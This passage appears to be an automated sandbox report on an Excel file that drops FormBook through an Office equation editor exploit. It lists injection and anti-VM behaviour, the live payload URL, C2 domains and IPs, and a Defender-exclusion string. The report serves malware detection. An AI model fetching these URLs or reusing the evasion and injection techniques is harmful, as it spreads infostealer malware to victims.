            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B842 push eax; ret 5_2_0041B848
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B84B push eax; ret 5_2_0041B8B2
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004188F2 push ds; ret 5_2_004188F3
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8AC push eax; ret 5_2_0041B8B2
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00416109 push cs; iretd 5_2_0041610A
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415237 pushfd ; iretd 5_2_00415238
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B7F5 push eax; ret 5_2_0041B848
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A6167 push 3A000004h; retf 0000h 5_2_011A616C
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A7296 push FFFFFFA1h; iretd 5_2_011A72A2
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A6AFF push es; iretd 5_2_011A6B51
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A642A push es; retf 5_2_011A6437
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021FDFA1 push ecx; ret 7_2_021FDFB4
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D6109 push cs; iretd 7_2_000D610A
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D5237 pushfd ; iretd 7_2_000D5238
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB7F5 push eax; ret 7_2_000DB848
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB84B push eax; ret 7_2_000DB8B2
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB842 push eax; ret 7_2_000DB848
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB8AC push eax; ret 7_2_000DB8B2
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D88F2 push ds; ret 7_2_000D88F3
            Source: initial sample | Static PE information: section name: .text entropy: 7.74258433139
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 4.2.vbc.exe.2626be0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.2647ca8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2540, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000000C8614 second address: 00000000000C861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000000C89AE second address: 00000000000C89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1828 | Thread sleep time: -300000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2548 | Thread sleep time: -38872s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 1352 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1612 | Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2812 | Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088E0 rdtsc 5_2_004088E0
            Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 38872
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmd.exe | Process token adjusted: Debug
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h] 5_2_008F26F8
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022026F8 mov eax, dword ptr fs:[00000030h] 7_2_022026F8
            Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
            Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: www.terapiaholisticaemformacao.com
            Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.220 80
            Source: C:\Windows\explorer.exe | Network Connect: 195.211.74.112 80
            Source: C:\Windows\explorer.exe | Domain query: www.ylhwcl.com
            Source: C:\Windows\explorer.exe | Domain query: www.integratedheartspsychology.com
            Source: C:\Windows\explorer.exe | Domain query: www.circlessalaries.com
            Source: C:\Windows\explorer.exe | Network Connect: 221.121.143.148 80
            Source: C:\Windows\explorer.exe | Domain query: www.topeasyip.company
            Source: C:\Windows\explorer.exe | Network Connect: 216.172.160.188 80
            Source: C:\Windows\explorer.exe | Network Connect: 23.80.120.93 80
            Source: C:\Windows\explorer.exe | Domain query: www.ecommerceoptimise.com
            Source: C:\Windows\explorer.exe | Network Connect: 122.10.28.11 80
            Source: C:\Windows\explorer.exe | Domain query: www.bjbwx114.com
            Source: C:\Windows\explorer.exe | Network Connect: 192.185.98.251 80
            Source: C:\Windows\explorer.exe | Domain query: www.orphe.biz
            Sample uses process hollowing technique
            Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 49D90000
            Maps a DLL or memory area into another process
            Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign process
            Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
            Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match | File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Masquerading111 | OS Credential Dumping | Security Software Discovery321 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools11 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol123 | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 552850. Sample: RFQ HCI20220113.xlsx. Start date: 13/01/2022. Architecture: WINDOWS. Score: 100.
            Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures. DNS/IP: www.norfg.com.
            Process chain recovered from the graph:
            • EXCEL.EXE started; dropped C:\Users\user\...\~$RFQ HCI20220113.xlsx (data).
            • EQNEDT32.EXE started; connected to 198.23.213.59, 49167, 80 (AS-COLOCROSSINGUS, United States); dropped C:\Users\user\AppData\Local\...\vbc[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started vbc.exe.
            • vbc.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures; started a second vbc.exe.
            • vbc.exe (child): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected explorer.exe.
            • explorer.exe (injected): connected to ecommerceoptimise.com 192.185.98.251, 49172, 80 (UNIFIEDLAYER-AS-1US, United States) and terapiaholisticaemformacao.com 216.172.160.188, 49171, 80 (UNIFIEDLAYER-AS-1US, United States); 8 other IPs or domains; System process connects to network (likely due to code injection or exploit); started cmd.exe.
            • cmd.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            RFQ HCI20220113.xlsx | 34% | Virustotal |
            RFQ HCI20220113.xlsx | 30% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\Public\vbc.exe | 100% | Avira | HEUR/AGEN.1211287
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Avira | HEUR/AGEN.1211287
            C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 44% | ReversingLabs | ByteCode-MSIL.Trojan.Bulz
            C:\Users\Public\vbc.exe | 44% | ReversingLabs | ByteCode-MSIL.Trojan.Bulz

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.0.vbc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.0.vbc.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.0.vbc.exe.11a0000.2.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.11a0000.6.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.11a0000.8.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.11a0000.1.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.2.vbc.exe.11a0000.4.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.11a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.11a0000.10.unpack | 100% | Avira | HEUR/AGEN.1211287
            4.0.vbc.exe.11a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.0.vbc.exe.11a0000.3.unpack | 100% | Avira | HEUR/AGEN.1211287
            5.0.vbc.exe.11a0000.4.unpack | 100% | Avira | HEUR/AGEN.1211287
            4.2.vbc.exe.11a0000.2.unpack | 100% | Avira | HEUR/AGEN.1211287

            Domains

Source | Detection | Scanner | Label | Link
www.norfg.com | 0% | Virustotal | | Browse
terapiaholisticaemformacao.com | 4% | Virustotal | | Browse

            URLs

Source | Detection | Scanner | Label | Link
http://java.sun.com | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
http://198.23.213.59/1155/vbc.exe | 100% | Avira URL Cloud | malware |
http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== | 0% | Avira URL Cloud | safe |
http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== | 0% | Avira URL Cloud | safe |
http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
www.topeasyip.company/i5nb/ | 100% | Avira URL Cloud | malware |
http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== | 0% | Avira URL Cloud | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr | 0% | Avira URL Cloud | safe |
http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== | 100% | Avira URL Cloud | malware |

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ecommerceoptimise.com | 192.185.98.251 | true | true | | unknown
www.norfg.com | 43.134.0.76 | true | false | | unknown
terapiaholisticaemformacao.com | 216.172.160.188 | true | true | | unknown
www.circlessalaries.com | 195.211.74.112 | true | true | | unknown
www.ylhwcl.com | 122.10.28.11 | true | true | | unknown
www.bjbwx114.com | 23.80.120.93 | true | true | | unknown
www.integratedheartspsychology.com | 221.121.143.148 | true | true | | unknown
www.orphe.biz | 103.224.212.220 | true | true | | unknown
www.terapiaholisticaemformacao.com | unknown | unknown | true | | unknown
www.topeasyip.company | unknown | unknown | true | | unknown
www.ecommerceoptimise.com | unknown | unknown | true | | unknown

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://198.23.213.59/1155/vbc.exe | true | Avira URL Cloud: malware | unknown
http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== | true | Avira URL Cloud: safe | unknown
http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== | true | Avira URL Cloud: safe | unknown
http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr | true | Avira URL Cloud: safe | unknown
www.topeasyip.company/i5nb/ | true | Avira URL Cloud: malware | low
http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== | true | Avira URL Cloud: safe | unknown
http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr | true | Avira URL Cloud: safe | unknown
http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== | true | Avira URL Cloud: malware | unknown

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://investor.msn.com | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                                  Contacted IPs


                                                  Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.224.212.220 | www.orphe.biz | Australia | | 133618 | TRELLIAN-AS-AP Trellian Pty Limited, AU | true
221.121.143.148 | www.integratedheartspsychology.com | Australia | | 45671 | AS45671-NET-AU Wholesale Services Provider, AU | true
216.172.160.188 | terapiaholisticaemformacao.com | United States | | 46606 | UNIFIEDLAYER-AS-1, US | true
23.80.120.93 | www.bjbwx114.com | United States | | 395954 | LEASEWEB-USA-LAX-11, US | true
195.211.74.112 | www.circlessalaries.com | Netherlands | | 51696 | ANTAGONIST-AS, NL | true
122.10.28.11 | www.ylhwcl.com | Hong Kong | | 134548 | DXTL-HK DXTL Tseung Kwan O Service, HK | true
198.23.213.59 | unknown | United States | | 36352 | AS-COLOCROSSING, US | true
192.185.98.251 | ecommerceoptimise.com | United States | | 46606 | UNIFIEDLAYER-AS-1, US | true

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:552850
                                                  Start date:13.01.2022
                                                  Start time:20:20:36
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 41s
